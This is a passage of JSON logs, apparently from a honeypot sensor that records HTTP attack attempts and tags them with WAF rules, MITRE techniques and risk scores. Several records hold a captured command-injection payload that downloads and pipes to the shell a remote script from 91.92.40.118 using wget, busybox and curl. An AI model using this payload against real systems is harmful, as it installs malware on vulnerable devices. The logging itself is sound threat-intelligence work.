82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 1\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_link3.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_link3.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_link3.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 1\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[]","severity":10,"bytes_in":320},{"id":11809392,"ip":"45.153.34.219","ts":"2026-07-14 02:18:17.000000","proto":"tcp","src_port":54870,"dst_port":82,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022330403c8b337dfacdd10ced73c0bc7b3134b9027\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 276, \u0022payload_entropy\u0022: 5.035522034319396, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022e163335757b89533063de03b6c82ee53c548dedd\u0022, \u0022event_fingerprint\u0022: \u00221b8be52c4b4510ada0e6132b4ae6268df7d94e9f\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00226300e90225580e3f4c2bdcfbe67bd024\u0022, \u0022path_pattern_hash\u0022: \u00223dbc30808e9f368b04f77623e2b863af\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60\u0022, \u0022query_string\u0022: \u0022host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.4\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60\u0022, \u0022query_string\u0022: \u0022host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nC\u0022, \u0022payload_snippet\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.4\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00227a4de16831a1c2dc95540f57ece981baafd23354\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.4\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.4\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_suspicious_params\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_suspicious_params\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":276},{"id":11809393,"ip":"45.153.34.219","ts":"2026-07-14 02:18:17.000000","proto":"tcp","src_port":54878,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/export-cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022300ab642a93228222cdb109780fc2f3ed2c05989\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 317, \u0022payload_entropy\u0022: 5.206794574300494, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022c646f31985be564f8ea585a35c4a8c6b8894c061\u0022, \u0022event_fingerprint\u0022: \u002203385f9672f2bc0115c237de3abfb747f6c3ecb2\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022a0db5d46382d4da66dbae19c9c32a200\u0022, \u0022path_pattern_hash\u0022: \u0022319aefac71fa65635eb60e229c574b1d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nCo\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/export-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, 